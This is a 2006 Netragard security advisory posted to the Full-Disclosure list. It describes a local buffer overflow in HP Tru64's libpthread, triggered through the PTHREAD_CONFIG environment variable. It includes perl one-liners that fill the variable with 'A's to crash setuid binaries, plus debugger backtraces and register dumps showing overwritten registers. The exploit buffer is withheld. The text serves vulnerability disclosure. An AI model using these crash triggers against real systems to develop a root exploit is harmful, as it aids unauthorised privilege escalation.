[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4553F73E.80203@netragard.com>
Date: Thu, 09 Nov 2006 22:51:26 -0500
From: Netragard Security Advisories <advisories@...ragard.com>
To: full-disclosure@...ts.grok.org.uk, David Morris <dmorris@...ragard.com>,
Tom Willmott <tom.willmott@...namclaytrust.com>, adriel@...ragard.com,
red@...research.com
Subject: [NETRAGARD-20061109 SECURITY ADVISORY] [HP Tru64
libpthread buffer overflow][http://www.netragard.com]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
******************** Netragard, L.L.C Advisory* *******************
Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."
[Advisory Information]
- ----------------------------------------------------------------------
Advisory ID : NETRAGARD-20060810
Advisory Contact : Adriel T. Desautels
Credit : Undisclosed
Product Name : libpthread
Product Version : 5.1b
Vendor Name : Hewlet Packard
Type of Vulnerability : Local Root Compromise
Effort : Very Difficult
Operating System : Tru64
Other : Buffer Overflow
[Product Description]
- ----------------------------------------------------------------------
The pthread library (libpthread) provides interfaces for developing
multi-threaded applications.
[Technical Summary]
- ----------------------------------------------------------------------
libpthread suffers from a buffer overflow vulnerability which may
enable an attacker to execute arbitrary commands on the system. This
vulnerability may potentially be exploited by a creating a specially
crafted buffer and inserting it into the PTHREAD_CONFIG variable.
[Technical Details]
- ----------------------------------------------------------------------
libpthread reads in the PTHREAD_CONFIG environment variable. It may be
possible to exploit libpthread on HP's tru64 by creating a specially
crafted buffer. The details below do not contain the specially crafted
buffer. Exploitation of this specific vulnerability is very difficult.
##################################################################
#
# Insert 273 A's (41) into the PTHREAD_CONFIG variable
#
##################################################################
OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)
##################################################################
#
# Insert 274 A's (41) into the PTHREAD_CONFIG variable
#
##################################################################
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8
ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc
ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48
ra=0x3ff805c8bf8 inst=0xa5090028
##################################################################
#
# Run newaliases in gdb with the -q flag.
#
##################################################################
bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
##################################################################
#
# Execute a back trace (bt) within gdb
#
##################################################################
(gdb) bt
#0 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1 0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2 0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols
(for example, in a stripped executable). In that case, you may wish to
increase the size of the search with the `set heuristic-fence-post'
command.
Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a bug in GDB.
#
# Execute Info Registers within gdb
#
(gdb) i r
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x40 64
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x4141414141414141 4702111234474983745
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
a0 0xbf 191
a1 0x11fff9918 4831811864
a2 0x11fff96b0 4831811248
a3 0x11fff9b34 4831812404
a4 0x0 0
a5 0x11fff9b30 4831812400
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805c8bf8 4395905092600
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff98b0 4831811760
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805c8bf8 4395905092600
vfp 0x11fff9900 4831811840
frame 2
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x11fff9a50 4831812176
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x1 1
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
##################################################################
#
# The following registers, a0, a1, a2, a3, a4, a5, have been
# overwritten with A's (0x41).
#
##################################################################
a0 0x4141414141414141 4702111234474983745
a1 0x4141414141414141 4702111234474983745
a2 0x4141414141414141 4702111234474983745
a3 0x4141414141414141 4702111234474983745
a4 0x4141414141414141 4702111234474983745
a5 0x4141414141414141 4702111234474983745
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805bc4f8 4395905041656
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff9a80 4831812224
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805bc4f8 4395905041656
##################################################################
#
# Other binaries which are linked agianst libpthread.so
# will also segfault when the PTHREAD_CONFIG variable
# is set to a large string of A's. The following is
# a list of some of those binaries
#
##################################################################
/usr/sbin/mailq
/usr/sbin/sendmail
/usr/sbin/sendmail.v8.11.1
/usr/sbin/smtpd
/usr/sbin/collect
/usr/dt/bin/mailcv
##################################################################
#
# Sendmail Example. Loading sendmail core file with
# the tru64 debugger.
#
##################################################################
bash-3.00# dbx ./sendmail core
dbx version 5.1
Type 'help' for help.
Core file created by program "sendmail"
warning: ./sendmail has no symbol table -- very little is
supported without it
signal Segmentation fault at >*[__putString, 0x3ff805c8bf8] ldq
t0, 64(s0)
(dbx) where
> 0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918)
[0x3ff805c8bf8]
1 __putFormatEol(0x4141414141414141, 0x4141414141414141,
0x4141414141414141, 0x4141414141414141, 0x4141414141414141)
[0x3ff805c8a74]
2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4,
0x3ffc01b8098, 0x3ff805c0a14) [0x3ff805bc4f4]
##################################################################
#
# Older versions are also vulnerable...
#
##################################################################
Older versions are also vulnerable...
tru64.netragard> uname -a
OSF1 tru64.netragard V5.0 910 alpha
tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'`
tru64.netragard> export PTHREAD_CONFIG
tru64.netragard> /usr/dt/bin/mailcv
%PTHREAD_CONFIG keyword
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
is not valid
Memory fault
Other binareis on 5.0
/usr/bin/ladebug
[Proof of Concept]
- ----------------------------------------------------------------------
Undislcosed
[Vendor Status]
- ----------------------------------------------------------------------
Vendor contacted patch released.
[About Netragard]
- ----------------------------------------------------------------------
Netragard offers specialized application, network security, and
managed security services which enable its clients to take a proactive
security stance. Each of our services is driven by security
professionals who specialize in specific areas of Information
Security. This specialized focus differentiates Netragard from the
competition by enabling Netragard to produce deliverables which are
the product of skilled security professionals and not the product of
automated tools and scripts.
[ For more information please visit http://www.netragard.com ]
[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.
<a href="http://www.netragard.com">http://www.netragard.com</a>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (Darwin)
iD8DBQFFU/c7Qwbn1P9Iaa0RAs+GAJ494WKCsHlPEFjsL1Zy+hQtpsGVRQCfSdUL
eUqI/l8ML/I2/rKIDHvZ/k8=
=h9zy
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists